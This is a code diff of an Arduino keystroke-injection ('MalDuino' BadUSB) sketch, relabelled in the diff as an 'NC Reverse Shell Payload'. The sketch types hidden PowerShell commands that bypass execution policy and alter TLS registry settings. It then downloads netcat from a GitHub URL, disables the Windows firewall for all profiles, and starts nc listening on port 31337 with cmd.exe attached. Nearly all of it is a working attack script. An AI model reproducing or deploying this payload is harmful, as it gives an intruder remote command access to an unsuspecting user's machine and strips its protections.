11/*
2- Single File Encryption Payload for GENERIC USB ATMEGA32U4 hw
2+ NC Reverse Shell Payload for GENERIC USB ATMEGA32U4 hw
33 Copyright (c) 2021, Paulo C. Marcon (Licensed under MIT)
44 For more information see: https://github.com/pcmarcon/malduino-payload-sample
55*/
@@ -174,7 +174,7 @@ void setup() {
174174 typeKey (KEY_RETURN);
175175
176176 delay (defaultDelay);
177- Keyboard.print (" powershell.exe -executionpolicy bypass -noprofile {New-Item 'HKLM:\\ SYSTEM\\ CurrentControlSet\\ Control\\ SecurityProviders\\ SCHANNEL\\ Protocols\\ TLS 1.3\\ Server' -Force}" );
177+ Keyboard.print (" powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden {New-Item 'HKLM:\\ SYSTEM\\ CurrentControlSet\\ Control\\ SecurityProviders\\ SCHANNEL\\ Protocols\\ TLS 1.3\\ Server' -Force}" );
178178
179179 delay (defaultDelay);
180180 delay (100 );
@@ -183,7 +183,7 @@ void setup() {
183183 typeKey (KEY_RETURN);
184184
185185 delay (defaultDelay);
186- Keyboard.print (" powershell.exe -executionpolicy bypass -noprofile {New-ItemProperty -path 'HKLM:\\ SYSTEM\\ CurrentControlSet\\ Control\\ SecurityProviders\\ SCHANNEL\\ Protocols\\ TLS 1.3\\ Server' -name 'Enabled' -value '0' -PropertyType 'DWord' -Force}" );
186+ Keyboard.print (" powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden {New-ItemProperty -path 'HKLM:\\ SYSTEM\\ CurrentControlSet\\ Control\\ SecurityProviders\\ SCHANNEL\\ Protocols\\ TLS 1.3\\ Server' -name 'Enabled' -value '0' -PropertyType 'DWord' -Force}" );
187187
188188 delay (defaultDelay);
189189 delay (100 );
@@ -192,7 +192,7 @@ void setup() {
192192 typeKey (KEY_RETURN);
193193
194194 delay (defaultDelay);
195- Keyboard.print (" powershell.exe -executionpolicy bypass -noprofile {New-ItemProperty -path 'HKLM:\\ SYSTEM\\ CurrentControlSet\\ Control\\ SecurityProviders\\ SCHANNEL\\ Protocols\\ TLS 1.3\\ Server' -name 'DisabledByDefault' -value 1 -PropertyType 'DWord' -Force}" );
195+ Keyboard.print (" powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden {New-ItemProperty -path 'HKLM:\\ SYSTEM\\ CurrentControlSet\\ Control\\ SecurityProviders\\ SCHANNEL\\ Protocols\\ TLS 1.3\\ Server' -name 'DisabledByDefault' -value 1 -PropertyType 'DWord' -Force}" );
196196
197197 delay (defaultDelay);
198198 delay (100 );
@@ -201,7 +201,7 @@ void setup() {
201201 typeKey (KEY_RETURN);
202202
203203 delay (defaultDelay);
204- Keyboard.print (" powershell.exe -executionpolicy bypass -noprofile {New-Item 'HKLM:\\ SYSTEM\\ CurrentControlSet\\ Control\\ SecurityProviders\\ SCHANNEL\\ Protocols\\ TLS 1.3\\ Client' -Force}" );
204+ Keyboard.print (" powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden {New-Item 'HKLM:\\ SYSTEM\\ CurrentControlSet\\ Control\\ SecurityProviders\\ SCHANNEL\\ Protocols\\ TLS 1.3\\ Client' -Force}" );
205205
206206 delay (defaultDelay);
207207 delay (100 );
@@ -210,7 +210,7 @@ void setup() {
210210 typeKey (KEY_RETURN);
211211
212212 delay (defaultDelay);
213- Keyboard.print (" powershell.exe -executionpolicy bypass -noprofile {New-ItemProperty -path ' HKLM: \\\\ SYSTEM \\\\ CurrentControlSet \\\\ Control \\\\ SecurityProviders \\\\ SCHANNEL \\\\ Protocols \\\\ TLS 1.3 \\\\ Client' -name 'Enabled' -value '0' -PropertyType 'DWord' -Force }" );
213+ Keyboard.print (" powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden {reg add HKLM\\ SOFTWARE \\ Microsoft \\ .NETFramework \\ v4.0.30319 /v SystemDefaultTlsVersions /t REG_DWORD /d 1 /f /reg:64 }" );
214214
215215 delay (defaultDelay);
216216 delay (100 );
@@ -219,7 +219,7 @@ void setup() {
219219 typeKey (KEY_RETURN);
220220
221221 delay (defaultDelay);
222- Keyboard.print (" powershell.exe -executionpolicy bypass -noprofile {New-ItemProperty -path 'HKLM: \\\\ SYSTEM \\\\ CurrentControlSet \\\\ Control \\\\ SecurityProviders \\\\ SCHANNEL \\\\ Protocols \\\\ TLS 1.3 \\\\ Client' -name 'DisabledByDefault' -value 1 -PropertyType 'DWord' -Force} " );
222+ Keyboard.print (" powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden \" (New-Object System.Net.WebClient).DownloadFile('https://raw.githubusercontent.com/pcmarcon/malduino-payload-samples/master/bin/nc.bin', 'nc.exe') \" " );
223223
224224 delay (defaultDelay);
225225 delay (100 );
@@ -228,16 +228,10 @@ void setup() {
228228 typeKey (KEY_RETURN);
229229
230230 delay (defaultDelay);
231- Keyboard.print (" powershell.exe -executionpolicy bypass -noprofile {reg add HKLM\\\\ SOFTWARE\\\\ Microsoft\\\\ .NETFramework\\\\ v4.0.30319 /v SystemDefaultTlsVersions /t REG_DWORD /d 1 /f /reg:64}" );
232-
233- delay (defaultDelay);
234- delay (100 );
235-
236- delay (defaultDelay);
237- typeKey (KEY_RETURN);
231+ delay (2000 );
238232
239233 delay (defaultDelay);
240- Keyboard.print (" powershell.exe -executionpolicy bypass -noprofile \" (New-Object System.Net.WebClient).DownloadFile('https://raw.githubusercontent.com/pcmarcon/malduino-payload-samples/master/bin/nc.bin', 'nc.exe') \" " );
234+ Keyboard.print (" netsh advfirewall set allprofiles state off " );
241235
242236 delay (defaultDelay);
243237 delay (100 );
@@ -246,10 +240,7 @@ void setup() {
246240 typeKey (KEY_RETURN);
247241
248242 delay (defaultDelay);
249- delay (2000 );
250-
251- delay (defaultDelay);
252- Keyboard.print (" netsh advfirewall set allprofiles state off" );
243+ Keyboard.print (" powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden \" %temp%\\ nc.exe -Lp 31337 -vv -e cmd.exe\" " );
253244
254245 delay (defaultDelay);
255246 delay (100 );
@@ -258,14 +249,14 @@ void setup() {
258249 typeKey (KEY_RETURN);
259250
260251 delay (defaultDelay);
261- Keyboard.print (" powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden \" %temp% \\ nc.exe -Lp 31337 -vv -e cmd.exe \" " );
252+ Keyboard.print (" exit " );
262253
263254 delay (defaultDelay);
264255 delay (100 );
265256
266257 delay (defaultDelay);
267258 typeKey (KEY_RETURN);
268-
259+
269260 /* ----- End-Payload -----*/
270261
271262 Keyboard.end ();
0 commit comments